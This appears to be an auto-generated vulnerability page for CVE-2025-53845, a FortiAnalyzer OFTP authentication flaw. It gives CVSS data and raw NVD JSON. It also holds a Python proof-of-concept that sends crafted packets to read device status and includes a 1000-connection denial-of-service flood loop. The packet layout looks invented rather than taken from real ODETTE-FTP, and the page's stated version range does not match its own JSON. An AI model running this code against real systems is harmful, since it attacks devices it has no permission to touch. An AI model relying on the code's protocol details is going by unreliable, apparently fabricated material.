Security Vulnerability Report
CVE-2025-53845 CVSS 6.5 MEDIUM

CVE-2025-53845

Published: 2025-10-14 16:15:39
Last Modified: 2025-10-15 17:19:50

Description

An improper authentication vulnerability [CWE-287] in Fortinet FortiAnalyzer version 7.6.0 through 7.6.3 and before 7.4.6 allows an unauthenticated attacker to obtain information pertaining to the device's health and status, or cause a denial of service via crafted OFTP requests.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* - VULNERABLE (Fortinet FortiAnalyzer >= 7.6.0, <= 7.6.3)
cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* - VULNERABLE (Fortinet FortiAnalyzer < 7.4.6)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53845 - FortiAnalyzer OFTP Improper Authentication PoC (Conceptual)
# This is a conceptual PoC demonstrating the exploitation of the OFTP authentication bypass
# in FortiAnalyzer. Use only for authorized security testing.

import socket
import struct

TARGET_HOST = "<fortianalyzer_ip>"
OFTP_PORT = 6619  # Default OFTP port for FortiAnalyzer


def build_evil_oftp_request():
    """
    Build a crafted OFTP request that bypasses authentication.
    OFTP uses a simple header structure. The vulnerability lies in the
    lack of proper authentication validation on the server side.
    """
    # OFTP Start Session Request (SSRM) - crafted without valid credentials
    # The server fails to verify the session initiator credentials
    ssrm_payload = b""
    # ODETTE-FTP header magic
    ssrm_payload += b"\x00\x00\x00\x00"
    # Command: SSRM (Start Session Ready Message) = 0x01
    ssrm_payload += b"\x01"
    # Version
    ssrm_payload += b"\x13"
    # Reserved
    ssrm_payload += b"\x00\x00"
    # Compress, Restarts, Resync, etc. flags
    ssrm_payload += b"\x00" * 4
    # User data - intentionally malformed/empty to trigger vuln
    ssrm_payload += b"ATTACKER\x00"
    # Password field - empty (bypass)
    ssrm_payload += b"\x00" * 8
    # OFTP length prefix
    length = struct.pack(">H", len(ssrm_payload))
    return length + ssrm_payload


def exploit_info_disclosure():
    """Exploit the auth bypass to read device health/status info."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    sock.connect((TARGET_HOST, OFTP_PORT))
    payload = build_evil_oftp_request()
    sock.send(payload)
    # Read server response - contains health/status info due to auth bypass
    response = sock.recv(4096)
    print(f"[*] Received response ({len(response)} bytes): {response.hex()}")
    sock.close()
    return response


def exploit_dos():
    """Trigger denial of service by flooding with crafted OFTP requests."""
    for _ in range(1000):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((TARGET_HOST, OFTP_PORT))
        payload = build_evil_oftp_request()
        sock.send(payload)
        sock.close()
    print("[+] DoS flood completed")


if __name__ == "__main__":
    exploit_info_disclosure()
    # exploit_dos()  # Uncomment to trigger DoS

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-378 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53845", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:39.010", "lastModified": "2025-10-15T17:19:50.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper authentication vulnerability [CWE-287] in Fortinet FortiAnalyzer version 7.6.0 through 7.6.3 and before 7.4.6 allows an unauthenticated attacker to obtain information pertaining to the device's health and status, or cause a denial of service via crafted OFTP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "7.4.7", "matchCriteriaId": "5CD897DB-50DB-420A-8DEB-E3D7FE52DBE6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "7E7EC074-7835-438D-8501-D7FA6A84F280"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-378", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}